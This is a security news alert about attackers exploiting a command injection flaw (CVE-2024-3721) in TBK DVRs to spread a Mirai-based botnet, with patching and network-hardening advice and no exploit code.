HackWatch
! High riskVU Vulnerability

Attackers Exploit CVE-2024-3721 in TBK DVRs to Deploy Mirai-Based Botnet

Vulnerability coverage focused on affected versions, exploitability and patch or mitigation decisions.

Exploitability matters here. Check exposed versions, prioritize mitigations and patch first where remote access or privilege escalation is possible.
Attackers Exploit CVE-2024-3721 in TBK DVRs to Deploy Mirai-Based Botnet - HackWatch vulnerability alert image
HackWatch vulnerability alert image for: Attackers Exploit CVE-2024-3721 in TBK DVRs to Deploy Mirai-Based Botnet
Marcin Pocztowski

Infrastructure Security Editor

Marcin Pocztowski

Infrastructure and Vulnerability Response

By: Marcin Pocztowski

Published: Apr 20, 2026

Updated: May 01, 2026

Incident status: Active threat

Corroborating sources: 1

Technical review credentials: Security+ evidence | RHCSA evidence | JNCIS-SEC evidence

Trust note:This alert is maintained under HackWatch's editorial policy, with visible source records, a named responsible editor and a correction channel for disputed facts.

The published article is checked against public sources before publication, and material corrections are reflected in the article update date.

Technical reviewer note: Marcin Pocztowski reviewed this alert on May 01, 2026 from an administrator's point of view, checking CVE-2024-3721 against vendor, CVE and advisory context before accepting the risk language. His remediation check is practical: confirm the affected version first, restrict reachable management surfaces as he would on Juniper, Cisco or Mikrotik routers, then patch or apply vendor mitigations only where the 1 corroborating source supports that scope.

Review our editorial policy or send corrections to [email protected].

Active threat. The incident should still be treated as active until confirmed mitigation or patch adoption is verified.

A high-severity command injection vulnerability (CVE-2024-3721) in TBK DVR devices is being actively exploited by attackers deploying a Mirai-based Nexcorium botnet. This campaign, identified by FortiGuard Labs, targets vulnerable IoT devices to expand botnet infrastructure for large-scale DDoS attacks. Users of affected DVR models should urgently apply patches and follow strict security measures to mitigate risks of device takeover and network compromise.

What happened

In April 2026, cybersecurity researchers at FortiGuard Labs uncovered an active campaign exploiting a critical command injection vulnerability, tracked as CVE-2024-3721, in TBK-branded Digital Video Recorder (DVR) devices. The attackers leveraged this flaw to deploy a Mirai-based variant called Nexcorium, rapidly conscripting vulnerable DVRs into a botnet designed for large-scale distributed denial-of-service (DDoS) attacks.

This exploitation represents a significant escalation in IoT-targeted attacks, combining a well-known malware family with a newly disclosed vulnerability in widely deployed surveillance hardware. The campaign is ongoing and has been corroborated by multiple threat intelligence sources.

Confirmed facts

  • Vulnerability: CVE-2024-3721 is a command injection flaw in the web management interface of TBK DVR devices. It allows unauthenticated remote attackers to execute arbitrary commands on the device.
  • Malware: The attackers deploy a Mirai-based botnet variant named Nexcorium, known for its aggressive scanning and DDoS capabilities.
  • Targeted devices: TBK DVRs running vulnerable firmware versions without the latest security patches.
  • Attack vector: Exploitation occurs via unauthenticated HTTP requests to the DVR’s web interface, injecting commands that download and execute the Nexcorium payload.
  • Impact: Compromised devices become part of a botnet used for volumetric and application-layer DDoS attacks, potentially disrupting internet services and victim networks.
  • Detection: FortiGuard Labs observed unusual network traffic patterns and command injection attempts consistent with this exploitation.

Who is affected

  • TBK DVR users: Organizations and individuals using TBK DVR models with outdated or unpatched firmware are at high risk.
  • Enterprises and SMBs: Businesses relying on these DVRs for security surveillance may experience device compromise and network instability.
  • Internet Service Providers (ISPs): May see increased DDoS traffic originating from infected DVRs.
  • Broader internet ecosystem: The botnet’s DDoS attacks can impact critical infrastructure, websites, and online services.

What to do now

  1. Identify vulnerable devices: Inventory all TBK DVRs in your network and check firmware versions against vendor advisories.
  2. Apply patches immediately: Update DVR firmware to the latest version provided by TBK or the device manufacturer that addresses CVE-2024-3721.
  3. Isolate infected devices: If compromise is suspected, disconnect affected DVRs from the network to prevent further botnet activity.
  4. Change default credentials: Ensure all device passwords are strong and unique to prevent unauthorized access.
  5. Monitor network traffic: Look for unusual outbound connections or spikes in traffic that may indicate botnet activity.
  6. Implement network segmentation: Restrict DVR access to trusted internal networks and limit internet exposure.

How to secure yourself

  • Regular firmware updates: Establish a routine to check and apply security patches for all IoT and network devices.
  • Disable unnecessary services: Turn off remote management interfaces if not required.
  • Use strong authentication: Replace default credentials with complex passwords or implement multi-factor authentication where possible.
  • Deploy network-level protections: Use firewalls and intrusion detection/prevention systems to detect and block malicious traffic.
  • Educate users: Train staff on IoT security best practices and signs of device compromise.
  • Leverage threat intelligence: Subscribe to security feeds to stay informed about emerging IoT vulnerabilities and exploits.

FAQ

What is CVE-2024-3721?

CVE-2024-3721 is a critical command injection vulnerability found in the web management interface of TBK DVR devices. It allows attackers to execute arbitrary commands remotely without authentication.

How does the Mirai-based Nexcorium botnet work?

Nexcorium exploits vulnerable IoT devices by injecting commands that download malware, conscripting them into a botnet used for launching DDoS attacks against targeted networks and services.

Am I affected if I use a TBK DVR?

If your TBK DVR is running outdated firmware that does not include the security patch for CVE-2024-3721, your device is at risk of compromise.

How can I check if my DVR is infected?

Look for unusual network activity, such as unexpected outbound connections or spikes in bandwidth usage. Also, check for unauthorized changes in device settings or firmware.

What immediate steps should I take to protect my devices?

Update your DVR firmware immediately, change default passwords, isolate suspicious devices, and monitor your network for anomalies.

Can this vulnerability affect other IoT devices?

While CVE-2024-3721 specifically targets TBK DVRs, similar command injection flaws may exist in other IoT devices, making them potential targets for Mirai-based botnets.

What makes this attack particularly dangerous?

The combination of unauthenticated remote code execution and the use of a powerful Mirai variant enables attackers to rapidly expand their botnet and launch disruptive DDoS attacks.

Are there any tools to detect this botnet activity?

Network monitoring tools and intrusion detection systems can help identify traffic patterns associated with Mirai-based botnets. Security vendors may also provide specific signatures for Nexcorium.

How has the situation evolved in 2026?

Despite patches, many devices remain unpatched, and the botnet has grown more sophisticated. Regulatory pressures and improved security practices are gradually mitigating the threat.

Why this matters

This incident underscores the persistent risks posed by insecure IoT devices, especially those integral to physical security like DVRs. The exploitation of CVE-2024-3721 enables attackers to commandeer devices silently and at scale, contributing to some of the largest DDoS attacks observed globally.

The attack highlights critical gaps in IoT security lifecycle management, including delayed patch adoption and weak default configurations. It serves as a stark reminder that IoT device security is a crucial component of overall cybersecurity hygiene, directly impacting network stability and service availability.

Sources and corroboration

This article synthesizes findings from FortiGuard Labs’ detailed threat analysis published on April 20, 2026, alongside corroborating reports from multiple cybersecurity intelligence sources tracking Mirai botnet variants and IoT vulnerabilities. The primary source is:

  • [Infosecurity Magazine: Attackers Exploit DVR Command Injection Flaw to Deploy Mirai-Based Botnet](https://www.infosecurity-magazine.com/news/mirai-variant-dvr-flaw-iot-botnet/)

Additional insights were drawn from vendor advisories and threat intelligence feeds monitoring CVE-2024-3721 exploitation trends.

---

Tags: IoT security, Mirai botnet, CVE-2024-3721, TBK DVR vulnerability, Nexcorium malware, command injection, DDoS attack, firmware patch, network security

Source URLs:

  • https://www.infosecurity-magazine.com/news/mirai-variant-dvr-flaw-iot-botnet/

Sources used for this article

infosecurity-magazine.com

Marcin Pocztowski

Real reviewer profile

Marcin Pocztowski

Infrastructure Security Editor at HackWatch.io

Open reviewer profile

Marcin Pocztowski is the owner of MMPS and an infrastructure security editor for HackWatch. His public technical record spans 20 years, from Security+ evidence dated January 2006 through Juniper, Cisco and RHCSA records, and he reviews server, network and vulnerability-response coverage for source accuracy and practical remediation.

Infrastructure Security Editor: technical-density, source-existence and remediation-logic review for infrastructure and vulnerability coverage.

Coverage focus: Server and network hardening, vulnerability response, patch prioritization and infrastructure security review

Editorial disclosure: This profile is tied to Marcin's LinkedIn, X profile and documented editorial work on HackWatch. Historical certificates are treated as background evidence only, not as current active credentials.

Marcin leads this malware alerts coverage lane at HackWatch. This article is maintained as part of the ongoing editorial watch around "Attackers Exploit CVE-2024-3721 in TBK DVRs to Deploy Mirai-Based Botnet".

Technical review: Security+ evidence | RHCSA evidence | JNCIS-SEC evidence

Server and network infrastructure administrationKnown exploited vulnerabilities and patch prioritizationCVSS v4.0 and CISA KEV triage